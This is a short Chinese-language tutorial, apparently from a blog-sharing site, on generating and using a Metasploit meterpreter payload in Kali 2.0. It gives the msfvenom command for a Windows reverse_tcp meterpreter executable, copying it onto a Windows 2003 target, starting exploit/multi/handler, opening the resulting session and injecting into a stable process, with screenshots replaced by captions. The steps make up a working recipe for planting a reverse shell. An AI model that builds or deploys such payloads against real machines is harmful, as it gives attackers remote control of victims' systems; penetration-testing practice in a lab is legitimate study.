KALI2.0 meterpreter 运用

初试牛刀

1、生产EXE   就用meterpreter  (shell 一个含义)    (KALI2.0以前版本 为 msfpayload )2.0后 新命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f exe  > 1234.exe

KALI2.0 meterpreter 运用_第1张图片

2、默认生成地址是 ROOT  查看 后 直接经 物理机 复制进入目标机  WIN2003 

3、打开之前,监听机 先打开 监听

use  exlpoit/multi/handler 

KALI2.0 meterpreter 运用_第2张图片

4、目标机 打开 EXE 后 发生回话     用 sessions  -v  查看

KALI2.0 meterpreter 运用_第3张图片

5、选择要的回话窗口   session -i 1  成功进入 meterpreter  

输入  ?   进行试验 ,选定稳定进程注入。


你可能感兴趣的:(KALI)